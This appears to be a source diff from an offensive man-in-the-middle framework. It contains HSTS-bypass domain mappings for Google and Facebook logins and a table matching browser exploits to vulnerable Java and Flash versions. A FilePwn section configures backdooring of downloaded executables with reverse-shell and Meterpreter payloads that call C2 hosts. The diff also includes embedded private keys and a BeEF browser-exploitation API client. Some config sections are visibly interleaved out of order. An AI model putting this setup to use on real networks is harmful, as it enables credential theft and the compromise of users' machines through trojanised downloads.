PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
[SSLstrip+]
#
#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
#
[[[multi/browser/java_atomicreferencearray]]]
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
#for facebook
www.facebook.com = social.facebook.com
[[[multi/browser/java_jre17_jmxbean_2]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_jre17_reflection_types]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_verifier_field_access]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
[[[multi/browser/java_jre17_provider_skeleton]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[exploit/windows/browser/adobe_flash_pcre]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
[[[exploit/windows/browser/adobe_flash_net_connection_confusion]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
[[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
[[[exploit/multi/browser/adobe_flash_opaque_background_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
PluginVersions = 11.1, 11.1.102.59, 11.1.102.62, 11.1.102.63, 11.1.111.44, 11.1.111.50, 11.1.111.54, 11.1.111.64, 11.1.111.73, 11.1.111.8, 11.1.115.34, 11.1.115.48, 11.1.115.54, 11.1.115.58, 11.1.115.59, 11.1.115.63, 11.1.115.69, 11.1.115.7, 11.1.115.81, 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273, 11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.327, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.411, 11.2.202.424, 11.2.202.425, 11.2.202.429, 11.2.202.438, 11.2.202.440, 11.2.202.442, 11.2.202.451, 11.2.202.468, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.244, 13.0.0.250, 13.0.0.257, 13.0.0.258, 13.0.0.259, 13.0.0.260, 13.0.0.262, 13.0.0.264, 13.0.0.289, 13.0.0.292, 13.0.0.302, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 17.0.0.190, 18.0.0.160, 18.0.0.194, 18.0.0.203, 18.0.0.204
[[[exploit/multi/browser/adobe_flash_hacking_team_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.292, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 18.0.0.161, 18.0.0.194
[FilePwn]
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
[[hosts]]
#whitelist host/IP - patch these only.
#ALL is everything, use the blacklist to leave certain hosts/IPs out
whitelist = ALL
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
blacklist = , # a comma is null do not leave blank
[[keywords]]
#These checks look at the path of a url for keywords
whitelist = ALL
#For blacklist note binaries that you do not want to touch at all
# Also applied in zip files
blacklist = .dll
[[ZIP]]
# patchCount is the max number of files to patch in a zip file
@ -334,7 +407,7 @@
patchCount = 5
# In Bytes
maxSize = 40000000
maxSize = 50000000
blacklist = .dll, #don't do dlls in a zip file
@ -346,7 +419,7 @@
patchCount = 5
# In Bytes
maxSize = 40000000
maxSize = 10000000
blacklist = , # a comma is null do not leave blank
@ -360,10 +433,9 @@
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
@ -379,28 +451,45 @@
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 8443
HOST = 192.168.20.79
PORT = 8090
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
ZERO_CERT = True
# PATCH_DLLs as they come across
PATCH_DLL = False
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# XP_MODE - to support XP targets
XP_MODE = True
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = veil_go_payload.exe
MSFPAYLOAD = windows/meterpreter/reverse_tcp
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 8088
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp
PATCH_DLL = True
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = pentest_x64_payload.exe
MSFPAYLOAD = windows/x64/shell/reverse_tcp
[[[[MachoIntelx86]]]]
SHELL = reverse_shell_tcp
@ -414,4 +503,26 @@
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
MSFPAYLOAD = linux/x64/shell_reverse_tcp
# Call out the difference for targets here as they differ from ALL
# These settings override the ALL settings
[[[sysinternals.com]]]
LinuxType = None
WindowsType = ALL
CompressedFiles = False
#inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]]
PATCH_DLL = False
ZERO_CERT = True
[[[sourceforge.org]]]
WindowsType = x64
CompressedFiles = False
[[[[WindowsIntelx64]]]]
PATCH_DLL = False
[[[[WindowsIntelx86]]]]
PATCH_DLL = False

View file

View file

@ -1,2 +0,0 @@
#!/bin/bash
openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr

View file

@ -1,19 +0,0 @@
-----BEGIN CERTIFICATE-----
MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
1eVgF/UkX9fqJg==
-----END CERTIFICATE-----

View file

@ -1,27 +0,0 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
-----END RSA PRIVATE KEY-----

View file

@ -0,0 +1,3 @@
#!/bin/bash
openssl genrsa -out responder.key 2048
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"

View file

@ -0,0 +1,18 @@
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
u0/CRCN/lg==
-----END CERTIFICATE-----

View file

@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
-----END RSA PRIVATE KEY-----

82
core/banners.py Normal file
View file

@ -0,0 +1,82 @@
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import random
banner1 = """
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
"""
banner2= """
"""
banner3 = """
"""
banner4 = """
"""
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner():
return random.choice([banner1, banner2, banner3, banner4, banner5])

@ -1 +0,0 @@
Subproject commit 28d2fef986e217425cb621701f267e40425330c4

367
core/beefapi.py Normal file
View file

@ -0,0 +1,367 @@
#! /usr/bin/env python2.7
# BeEF-API - A Python API for BeEF (The Browser Exploitation Framework) http://beefproject.com/
# Copyright (c) 2015-2016 Marcello Salvati - byt3bl33d3r@gmail.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import requests
import json
from UserList import UserList
class BeefAPI:
def __init__(self, opts=[]):
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "3000"
self.token = None
self.url = "http://{}:{}/api/".format(self.host, self.port)
self.login_url = self.url + "admin/login"
def login(self, username, password):
try:
auth = json.dumps({"username": username, "password": password})
r = requests.post(self.login_url, data=auth)
data = r.json()
if (r.status_code == 200) and (data["success"]):
self.token = data["token"] #Auth token
self.hooks_url = "{}hooks?token={}".format(self.url, self.token)
self.modules_url = "{}modules?token={}".format(self.url, self.token)
self.logs_url = "{}logs?token={}".format(self.url, self.token)
self.are_url = "{}autorun/rule/".format(self.url)
self.dns_url = "{}dns/ruleset?token={}".format(self.url, self.token)
return True
elif r.status_code != 200:
return False
except Exception as e:
print "[BeEF-API] Error logging in to BeEF: {}".format(e)
@property
def hooked_browsers(self):
r = requests.get(self.hooks_url)
return Hooked_Browsers(r.json(), self.url, self.token)
@property
def dns(self):
r = requests.get(self.dns_url)
return DNS(r.json(), self.url, self.token)
@property
def logs(self):
logs = []
r = requests.get(self.logs_url)
for log in r.json()['logs']:
logs.append(Log(log))
return logs
@property
def modules(self):
modules = ModuleList([])
r = requests.get(self.modules_url)
for k,v in r.json().iteritems():
modules.append(Module(v, self.url, self.token))
return modules
@property
def are_rules(self):
return ARE_Rules(self.are_url, self.token)
class ModuleList(UserList):
def __init__(self, mlist):
self.data = mlist
def findbyid(self, m_id):
for m in self.data:
if m_id == m.id:
return m
